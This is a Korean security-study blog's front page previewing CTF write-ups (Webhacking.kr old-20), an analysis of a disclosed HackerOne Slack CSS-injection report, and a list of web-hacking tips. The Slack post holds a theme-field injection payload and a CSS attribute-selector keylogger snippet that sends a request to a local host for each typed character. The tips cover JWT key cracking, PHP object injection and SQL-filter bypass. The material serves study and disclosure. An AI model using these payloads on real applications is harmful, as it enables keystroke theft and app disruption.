ICEBEAR can pwn...

블로그 이미지

ICEB34R

공부하는 아이스베어는 귀엽습니다..!

'전체 글'에 해당되는 글 27건

제목 날짜
  • [Webhacking.kr] Old-20 2020.01.02
  • [slack] CSS Injection to disable app & potential message exfil 2019.11.11
  • 웹해킹 팁.. 2019.10.12
  • [Week 7] rop 2019.08.26

[Webhacking.kr] Old-20

Web Hacking 2020. 1. 2. 00:41


2초안에 nickname comment captcha를 입력하고 submit하면 되는 간단한 문제인 것 같다.


손으로 해본 결과 Too Slow라고 뜨고 3초뒤 refresh된다.


Submit을 눌렀을 때 ck()라는 함수가 실행이 되는 것을 소스코드를 통해 알게 되었다. 각 필드의 값이 공백인지 확인하고,

captcha의 경우 동일한 값을 가지는지 체크를 한다.


그러면 각 필드의 값을 채워주고, .submit()을 해주면 문제가 풀릴 것이다. 위의 코드를 콘솔에 쳐서 실행시켜 보았다.


해-결

'Web Hacking' 카테고리의 다른 글

[Webhacking.kr] Old-10  (0) 2020.01.04
[Webhacking.kr] Old-32  (0) 2020.01.03
[Webhacking.kr] Old-60  (0) 2020.01.02
Posted by ICEB34R

[slack] CSS Injection to disable app & potential message exfil

Web Hacking/hackerone 바운티 분석 2019. 11. 11. 15:52
  • 대상 : Slack
  • 취약점 : Improper Input Validation, css injection
  • 위험도 : Medium (4.3)
  • 바운티 : 500$
  • 링크 : https://hackerone.com/reports/679969

Slack Mac OS v4.0.2에서 테스팅 하였습니다.

  1. 설정 -> 테마 -> 사이드 바
  2. 커스텀 테마 설정
  3. column BG 를 #FFFFFF;} html {display:none;} 로 변경
  4. 앱이 터짐
input[type="text"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

커스텀 테마 형식으로 배포된다면 해당 코드가 삽입되어 키로거로 활용될 수 있음.

Posted by ICEB34R

웹해킹 팁..

Web Hacking/메모장 2019. 10. 12. 23:55

1.

python3 arjun.py -u [http://some.url](https://imgxweb.rootersctf.in/) --get

- url에 파라미터가 어떤 것이 있는지 알려줌 스캔은 보통 30초정도 걸리고 휴리스틱인 파라미터를 찾아주는듯

 

2.

JWT가 보이면 키를 찾아보자.

john the ripper 로 key를 찾는게 가능할수도

 

3.

robots.txt에서 문제에 대한 힌트를 찾을 수도 있다.

 

4.

PHP Object Injection이라는게 있다고 한다.

s:4 s:5 어쩌구 그거다

 

5.

sqlinjection 

adadminmin

%23

urldecode 두번되는 경우

 

6.

SSI

https://github.com/lavish/ctf-writeups/tree/master/hacklu2019-TreesForFuture

 

lavish/ctf-writeups

Contribute to lavish/ctf-writeups development by creating an account on GitHub.

github.com

 

Posted by ICEB34R

[Week 7] rop

Pwnable/Whois pwnable assignment 2019. 8. 26. 14:43

Week7_rop.pptx
0.61MB

'Pwnable > Whois pwnable assignment' 카테고리의 다른 글

[Week6] rpsAI, 64bit  (0) 2019.08.11
[Week 5] Escape Paldal  (4) 2019.08.04
[week 4] RTL,IDA  (5) 2019.07.29
[week 3] got overwrite , pwntools  (6) 2019.07.15
[week 2] canary, shellcode  (7) 2019.07.07
Posted by ICEB34R
이전페이지 다음페이지
블로그 이미지

공부하는 아이스베어는 귀엽습니다..!

by ICEB34R

공지사항

    최근...

  • 포스트
  • 댓글
  • 트랙백
  • 더 보기

태그

  • InsecureBank
  • malloc
  • 안드로이드
  • fastbin
  • fastbin dup
  • 안드로이드모의해킹
  • 앱취약점
  • 인시큐어뱅크
  • pwnable
  • 0ctf
  • 안드로이드취약점
  • babyheap
  • 앱모의해킹
  • write-up
  • hackerone #버그 바운티 분석 #css injection #slack

글 보관함

«   2025/06   »
일 월 화 수 목 금 토
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30

링크

카테고리

ICEBEAR's workbench (27)
Web Hacking (6)
메모장 (1)
hackerone 바운티 분석 (1)
Pwnable (15)
낙서장 (0)
탐구 (2)
Write-up (1)
Window Exploit (1)
Whois pwnable assignment (7)
안드로이드 (5)
InsecureBank (5)
IoT (1)
잡담 (0)

카운터

Total
Today
Yesterday
방명록 : 관리자 : 글쓰기
ICEB34R's Blog is powered by daumkakao
Skin info material T Mark3 by 뭐하라
favicon

ICEBEAR can pwn...

공부하는 아이스베어는 귀엽습니다..!

  • 태그
  • 링크 추가
  • 방명록

관리자 메뉴

  • 관리자 모드
  • 글쓰기
  • ICEBEAR's workbench (27)
    • Web Hacking (6)
      • 메모장 (1)
      • hackerone 바운티 분석 (1)
    • Pwnable (15)
      • 낙서장 (0)
      • 탐구 (2)
      • Write-up (1)
      • Window Exploit (1)
      • Whois pwnable assignment (7)
    • 안드로이드 (5)
      • InsecureBank (5)
    • IoT (1)
    • 잡담 (0)

카테고리

PC화면 보기 티스토리 Daum

티스토리툴바